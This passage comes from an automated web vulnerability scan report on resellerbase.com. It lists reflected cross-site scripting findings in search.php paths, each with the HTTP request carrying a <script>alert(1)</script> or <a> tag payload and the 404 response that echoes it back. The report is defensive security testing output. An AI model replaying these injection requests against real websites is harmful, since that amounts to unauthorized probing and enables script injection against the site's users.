Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6d2be<script>alert(1)</script>b74c7351535=1 was not found on this server.</p>
...[SNIP]...

2.891. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8e566<a>2ddb8add7b7 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=28e566<a>2ddb8add7b7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=28e566<a>2ddb8add7b7 was not found on this server.</p>
...[SNIP]...

2.892. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ed19<script>alert(1)</script>e9af58aad6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3ed19<script>alert(1)</script>e9af58aad6/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3ed19<script>alert(1)</script>e9af58aad6/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.893. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e02b8<script>alert(1)</script>d1c7da3797e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10e02b8<script>alert(1)</script>d1c7da3797e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10e02b8<script>alert(1)</script>d1c7da3797e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.894. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27b48<script>alert(1)</script>aefcd4d5c25 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes27b48<script>alert(1)</script>aefcd4d5c25/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes27b48<script>alert(1)</script>aefcd4d5c25/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.895. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f3750<script>alert(1)</script>96f19bf9b1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmosf3750<script>alert(1)</script>96f19bf9b1a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmosf3750<script>alert(1)</script>96f19bf9b1a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.896. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b1e5<script>alert(1)</script>44e92b28c52 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/search.php2b1e5<script>alert(1)</script>44e92b28c52?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php2b1e5<script>alert(1)</script>44e92b28c52?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.897. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8b39c<a>f5344619da0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search8b39c<a>f5344619da0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search8b39c<a>f5344619da0&opt=2 was not found on this server.</p>
...[SNIP]...

2.898. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b16b3<a>2213dd70319 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...b16b3<a>2213dd70319&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...b16b3<a>2213dd70319&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.899. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 730d3<script>alert(1)</script>295005a3b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&730d3<script>alert(1)</script>295005a3b49=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&730d3<script>alert(1)</script>295005a3b49=1 was not found on this server.</p>
...[SNIP]...

2.900. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6627a<a>dcc21b58da was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26627a<a>dcc21b58da HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26627a<a>dcc21b58da was not found on this server.</p>
...[SNIP]...

2.901. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1fa0<script>alert(1)</script>016d92af695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild1fa0<script>alert(1)</script>016d92af695/10/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild1fa0<script>alert(1)</script>016d92af695/10/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.902. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8783<script>alert(1)</script>7c286f6044c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10c8783<script>alert(1)</script>7c286f6044c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10c8783<script>alert(1)</script>7c286f6044c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.903. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 21ea3<script>alert(1)</script>3f1765e31d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes21ea3<script>alert(1)</script>3f1765e31d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes21ea3<script>alert(1)</script>3f1765e31d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.904. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a42be<script>alert(1)</script>8ad7971f155 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/search.phpa42be<script>alert(1)</script>8ad7971f155?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.phpa42be<script>alert(1)</script>8ad7971f155?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.905. http://www.resellerbase.com/detail/10/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4517a<a>0c4b2e5aa7a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search4517a<a>0c4b2e5aa7a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...&Submit3=Search4517a<a>0c4b2e5aa7a&opt=2 was not found on this server.</p>
...[SNIP]...

2.906. http://www.resellerbase.com/detail/10/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 19ccf<a>a5d742e8e9d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/search.php?keyword=search...19ccf<a>a5d742e8e9d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...19ccf<a>a5d742e8e9d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.907. http://www.resellerbase.com/detail/10/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 714fe<script>alert(1)</script>5e24f3fc98f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=2&714fe<script>alert(1)</script>5e24f3fc98f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=2&714fe<script>alert(1)</script>5e24f3fc98f=1 was not found on this server.</p>
...[SNIP]...

2.908. http://www.resellerbase.com/detail/10/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5bc9d<a>c92b91ad994 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=25bc9d<a>c92b91ad994 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
